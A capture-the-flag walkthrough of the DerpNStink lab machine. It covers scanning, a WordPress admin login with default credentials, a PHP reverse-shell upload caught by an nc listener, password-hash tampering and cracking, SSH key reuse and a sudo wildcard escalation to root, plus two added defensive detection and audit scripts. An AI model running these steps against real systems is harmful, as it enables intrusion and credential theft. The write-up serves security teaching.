# DerpNStink

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/DNS 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 04:37 EDT
Nmap scan report for 192.168.1.116
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:7D:91:B5 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
```

Let's open the IP in the web browser.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A-Tc63uSURbQHHd-d%2Fimage.png?alt=media\&token=bc5ad2cd-fff4-4784-9cec-146f563cc99c)

If we open Inspect Element and expand all the `div` elements, we can get the first flag.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AtBYTz53KeFg07TxL%2Fimage.png?alt=media\&token=2b68db0f-d8b1-4b80-8725-6a9b4ff3b3b6)

### Dirb

```
dirb http://192.168.1.116/
```

```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 25 04:50:28 2020
URL_BASE: http://192.168.1.116/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.116/ ----
==> DIRECTORY: http://192.168.1.116/css/                                                                                              
+ http://192.168.1.116/index.html (CODE:200|SIZE:1298)                                                                                
==> DIRECTORY: http://192.168.1.116/javascript/                                                                                       
==> DIRECTORY: http://192.168.1.116/js/                                                                                               
==> DIRECTORY: http://192.168.1.116/php/                                                                                              
+ http://192.168.1.116/robots.txt (CODE:200|SIZE:53)                                                                                  
+ http://192.168.1.116/server-status (CODE:403|SIZE:293)                                                                              
==> DIRECTORY: http://192.168.1.116/temporary/                                                                                        
==> DIRECTORY: http://192.168.1.116/weblog/   
```

Both the nmap and dirb scans show a `robots.txt`, so let's navigate there.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A-bpmu9adbWHI9tns%2Fimage.png?alt=media\&token=7b12567f-b4f5-422b-978e-8245b9acf906)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A-nADQayOSMWBS1eW%2Fimage.png?alt=media\&token=1d823e17-5549-4966-b366-7a014a26311b)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A-peND3WV5ba3bMAv%2Fimage.png?alt=media\&token=23873266-259f-4830-b057-7d8e3f59c2e3)

As we can see, we don't have permission on `/php`, and `/temporary` told us to try harder.

We can also see `/weblog` in the dirb scan. After navigating there, I got an error.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A0wAF-4zNWFAzVWLH%2Fimage.png?alt=media\&token=2b5c0866-1df8-4f78-8d66-3cac92fbddb6)

I open `/etc/hosts` and add the IP there.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A18I_PPouJrFRtDs3%2Fimage.png?alt=media\&token=1b959e4c-69d4-4441-9d78-a429d9cabb67)

After that, refresh the page and we can see a WordPress blog.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A1IkPjz5VfQNw2zkx%2Fimage.png?alt=media\&token=b2ba940d-9875-4bcb-9da6-32a33a4e2647)

### Wpscan

```
wpscan --url http://derpnstink.local/weblog/ --enumerate u,ap --plugins-detection aggressive
```

```
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://derpnstink.local/weblog/ [192.168.1.116]
[+] Started: Mon May 25 04:55:03 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://derpnstink.local/weblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://derpnstink.local/weblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://derpnstink.local/weblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.18 identified (Latest, released on 2020-04-29).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.18'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.18'

[+] WordPress theme in use: twentysixteen
 | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:19 <===================================================> (86907 / 86907) 100.00% Time: 00:02:19
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://derpnstink.local/weblog/wp-content/plugins/akismet/
 | Last Updated: 2020-04-29T13:02:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.1.5
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/, status: 200
 |
 | Version: 3.1.11 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2019-07-12T13:09:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | [!] The version is out of date, the latest version is 1.6.12
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/, status: 403
 |
 | Version: 1.4.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] unclestinky
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May 25 04:57:36 2020
[+] Requests Done: 86966
[+] Cached Requests: 12
[+] Data Sent: 22.571 MB
[+] Data Received: 11.789 MB
[+] Memory used: 368.992 MB
[+] Elapsed time: 00:02:33
```

We got 2 plugins and 2 usernames. On the first try, I managed to log in using the username `admin` and password `admin`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A48-VH770y56yuUtw%2Fimage.png?alt=media\&token=a300f48c-6c91-4a77-aaa1-5ea41c9eecef)

After clicking around, I found out that under Manage Slides we can edit the slideshow, and at the bottom we can upload an image. So, I decided to upload a shell file.
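The scan above leaves a recognisable trail in the web server's access log: sequential `?author=N` requests and a long run of 404s under `/wp-content/plugins/`. The detector below is an added example, not part of the original walkthrough; the log lines, client addresses and thresholds are constructed, and the Apache combined log format is assumed.

```python
import re
from collections import defaultdict

# Apache combined log format: client IP, request line, status code.
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')
AUTHOR = re.compile(r"[?&]author=(\d+)")
PLUGIN = re.compile(r"/wp-content/plugins/([^/?]+)/")


def detect_wp_enumeration(lines, min_authors=5, min_missing_plugins=20):
    """Map client IP -> reasons it looks like user/plugin enumeration."""
    author_ids = defaultdict(set)       # distinct ?author=N values per client
    missing_plugins = defaultdict(set)  # distinct plugin slugs that returned 404
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, uri, status = m["ip"], m["uri"], int(m["status"])
        author = AUTHOR.search(uri)
        if author:
            author_ids[ip].add(int(author.group(1)))
        plugin = PLUGIN.search(uri)
        # Real visitors load assets of installed plugins (200); guessed slugs return 404.
        if plugin and status == 404:
            missing_plugins[ip].add(plugin.group(1))
    alerts = {}
    for ip in sorted(set(author_ids) | set(missing_plugins)):
        reasons = []
        if len(author_ids[ip]) >= min_authors:
            reasons.append("author-id enumeration")
        if len(missing_plugins[ip]) >= min_missing_plugins:
            reasons.append("plugin directory probing")
        if reasons:
            alerts[ip] = reasons
    return alerts


def sample_log():
    """Constructed access-log lines: one scanning client, one ordinary visitor."""
    fmt = '{ip} - - [25/May/2020:04:55:10 -0400] "GET {uri} HTTP/1.1" {st} 512 "-" "constructed-agent"'
    scanner, visitor = "192.168.1.50", "192.168.1.77"  # constructed addresses
    lines = [fmt.format(ip=scanner, uri=f"/weblog/?author={i}", st=301 if i <= 2 else 404)
             for i in range(1, 11)]
    lines += [fmt.format(ip=scanner, uri=f"/weblog/wp-content/plugins/guess-{i}/", st=404)
              for i in range(30)]
    lines += [fmt.format(ip=visitor, uri="/weblog/?author=1", st=200),
              fmt.format(ip=visitor, uri="/weblog/wp-content/plugins/akismet/akismet.css", st=200)]
    return lines


if __name__ == "__main__":
    for ip, reasons in detect_wp_enumeration(sample_log()).items():
        print(ip, ", ".join(reasons))
```

The User-Agent field is ignored on purpose, since the client chooses it; the request pattern is what gives the scan away.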

## Exploitation

### Reverse Shell

Go to this page and download the php reverse shell file from [pentestmonkey](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A8rQguug1Beb06XHW%2Fimage.png?alt=media\&token=7eeefe5c-78c4-4617-942a-7e445ab25349)

Change the IP and the port to those of our machine, then set up a listener:

```
nc -nlvp 4444
```

Then we can go to `Manage Slides`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9BFotlq6wQ7zAU_A%2Fimage.png?alt=media\&token=7fed1164-7c32-4d27-b1a9-e377b40ff2ad)

And I click `randonx` to edit

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9GfV72ePZW9NqC1y%2Fimage.png?alt=media\&token=5ef68f08-a64c-4d82-94a6-23b8a0e314ee)

Scrolling to the bottom, we can see this:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9MKJOVlMMww74vgD%2Fimage.png?alt=media\&token=4ff7654e-d9ae-403a-85f4-4233a71c65d9)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9OdyfjxVHE77aUZU%2Fimage.png?alt=media\&token=cbfb2a28-d92c-4bf5-b859-b11649c94403)

Upload the reverse shell file.

Then go back to the `/weblog`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9XpPMpqKsYgBNXR2%2Fimage.png?alt=media\&token=db0f948c-3aec-4800-a6e3-cab691117b52)

Click the right arrow on the slides until you get a reverse shell!

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9hmK2YT5edTOYzmV%2Fimage.png?alt=media\&token=48c138b5-21c2-4491-9dfb-915913e7f9aa)

And then we can type

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8AB65F6nW4te-tQBf4%2Fimage.png?alt=media\&token=c3bd1d20-cfb3-4b8c-8eaf-b699cdc8ace1)

When I ran `linpeas.sh`, I found the MySQL username and password.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AXPhE_-0Y-RIAMuop%2Fimage.png?alt=media\&token=7f00c815-d7c0-44c2-bc6d-abff7270f66b)

Then we can go to `/php/myphpadmin` to log in to the MySQL database.

Then go to the WordPress database and open `wp_users`.

I found that the hash is too difficult to crack because of the hash, so to make it easy, I copied the admin hash to replace the `unclestinky` hash.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AXoO5GHipji0WjZa2%2Fimage.png?alt=media\&token=05c4185e-5e90-4e46-99d8-ab8799baef0e)

Then we can log in to WordPress again.

Go to the post, and we will find the second flag.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AXxltNJ2zqarz_9GQ%2Fimage.png?alt=media\&token=28a323d0-40d6-4dc2-97b9-4d8807d115d5)

We then go back to the database, open the `mysql` database and go to the `user` table.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8A_KCYqMNmJ9eG0_U6%2Fimage.png?alt=media\&token=2561a5f5-d43d-44e8-bbb2-a803d1974df7)

Then we can take unclestinky's password and crack it at [CrackStation](https://crackstation.net/).

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8A_FZV7tIsr_ApCvok%2Fimage.png?alt=media\&token=aa21e4d8-23fa-48cb-84ec-691ab11dbf6c)

We got the password `wedgie57`

We then can ssh to the user **stinky**

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8A_l_8LWEbsg6b1-Bl%2Fimage.png?alt=media\&token=6b20ae8c-e099-4f89-8e7c-d7c068f38b52)

Then I went to the Desktop folder and I found the third flag!

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AcAXRKFje0jBKokrS%2Fimage.png?alt=media\&token=61572e8d-80f4-43b4-b06e-b9ccb8d1e725)

After that, I went to the `/home` directory and found an ftp folder.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AaD31-qV51hM0-d0h%2Fimage.png?alt=media\&token=6c39b25d-e300-40c2-b851-3f695761222a)

Inside, there is a bunch of `ssh` folders nested inside each other.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AaGHia-QN2AHLXWzE%2Fimage.png?alt=media\&token=8946e42e-7e54-48ab-a9d6-690a7377efa3)

After changing directory 7 times, we got `key.txt`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AaPr59JfMLStF9RaF%2Fimage.png?alt=media\&token=c59ffd73-af15-4f60-9452-6c54f23e9db9)

It contains an RSA private key.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AaS-q0S10JqMiR6-D%2Fimage.png?alt=media\&token=b414ec7f-9b1c-4396-92bc-a6a2ea82abf5)

This might be a clue for connecting over SSH as the user stinky.

We save the RSA key text to a file called `id_rsa` and put it in `/root/.ssh`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AegPqDUo-EXzDGFtP%2Fimage.png?alt=media\&token=1070bfaa-65ee-49b1-9d27-d3aa64361983)

We can see that the permissions on `id_rsa` are too open, so we need to change them.

Type `chmod 700 id_rsa`.

Then we can ssh into it:

```
ssh -i /root/.ssh/id_rsa stinky@192.168.1.116
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8Af1enPMmbax61wP6i%2Fimage.png?alt=media\&token=3a95e7b9-0d5f-4444-8176-bd1866adc47e)

Then navigate to `/home/Stinky/Documents`, where we can get a pcap file.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8Agsv7hUdUAHL5rg5M%2Fimage.png?alt=media\&token=e580ac7c-fd91-46cb-ac95-ca376728c5aa)

Transfer it using `nc` to our machine

Then analyse the file using `wireshark`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AoEfeiNID2L6wbgBn%2Fimage.png?alt=media\&token=f1979dda-4ccb-44bc-9de9-6ff4204fccc5)

Then we can follow the TCP stream and this is the password for user mrderp.

We then `su` to user `mrderp`.

Then type `sudo -l`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8Ao_sU7JxhftpVv51D%2Fimage.png?alt=media\&token=9ea1a460-3c92-47cd-8fa9-fba7188591fd)

## Privilege Escalation

We can see that `/home/mrderp` does not contain a folder called `binaries`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8ArfqLy3Y8T_WE-Z1O%2Fimage.png?alt=media\&token=ad67e205-26be-4430-8999-92bdf178e661)

So we need to create one

```
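mkdir binaries
cd binaries
# derpy.sh is created inside /home/mrderp/binaries
echo "/bin/bash" > derpy.sh
chmod 777 derpy.sh
# Run the script through sudo using its full path under binaries/
sudo /home/mrderp/binaries/derpy*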
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AseND0DJfb0blwC8T%2Fimage.png?alt=media\&token=1d551221-b0b9-4145-88c3-56afd77410c6)

Got root!

Navigate to the `/root/Desktop` to get the fourth flag

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AslmYWD48UKj9q8ql%2Fimage.png?alt=media\&token=d70832dc-7adb-4dbf-aa0c-250c0ad94e97)
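The escalation works because the `sudo` rule points into a directory that `mrderp` owns, so that user decides what the rule ends up executing. The audit below is an added example, not part of the original walkthrough; the sudoers lines and the `stat -c '%n %U %a'` listing are constructed, and the rule `/home/mrderp/binaries/derpy*` is assumed from the commands above because the `sudo -l` output is only shown as a screenshot.

```python
import re

GLOB = re.compile(r"[*?\[]")

# Constructed inputs: two sudoers rules and a `stat -c '%n %U %a'` listing.
SUDOERS = """\
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
backup ALL=(root) NOPASSWD: /usr/bin/id
"""
STAT = """\
/ root 755
/home root 755
/home/mrderp mrderp 755
/usr root 755
/usr/bin root 755
/usr/bin/id root 755
"""

def parse_stat(text):
    """Parse 'path owner octal-mode' lines into {path: (owner, mode)}."""
    rows = (line.rsplit(None, 2) for line in text.strip().splitlines())
    return {path: (owner, int(mode, 8)) for path, owner, mode in rows}

def parse_sudoers(text):
    """Yield (user, command path) for simple 'user HOST=(runas) [TAG:] cmd, ...' rules."""
    for line in text.splitlines():
        m = re.match(r"\s*([^#\s]\S*)\s+\S+?=\s*(?:\([^)]*\))?\s*(.*)", line)
        if not m or m.group(1) == "Defaults":
            continue
        for cmd in m.group(2).split(","):
            cmd = re.sub(r"^\s*(?:[A-Z_]+:\s*)*", "", cmd).strip()
            if cmd.startswith("/"):
                yield m.group(1), cmd.split()[0]

def weak_component(cmd, inodes, trusted=("root",)):
    """Return (path, reason) for the first component of cmd a non-root user controls."""
    path = ""
    for part in [""] + [p for p in cmd.split("/") if p]:
        if GLOB.search(part):
            break  # wildcard leaf: decided by its parent, which was already checked
        path = (path.rstrip("/") + "/" + part) if part else "/"
        if path not in inodes:
            break  # missing entry: only creatable by owners of the checked parents
        owner, mode = inodes[path]
        if owner not in trusted:
            return path, f"owned by {owner}"
        if mode & 0o002:
            return path, f"mode {mode:o} is world-writable"
    return None

def audit(sudoers_text, stat_text):
    """Return (user, command, weak path, reason) for each rule a user can hijack."""
    inodes = parse_stat(stat_text)
    hits = ((u, c, weak_component(c, inodes)) for u, c in parse_sudoers(sudoers_text))
    return [(u, c) + hit for u, c, hit in hits if hit]

if __name__ == "__main__":
    print(audit(SUDOERS, STAT))
```

A rule that passes this check names a command whose every parent directory is owned by root and not world-writable, which is the property the rule on this box lacks.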
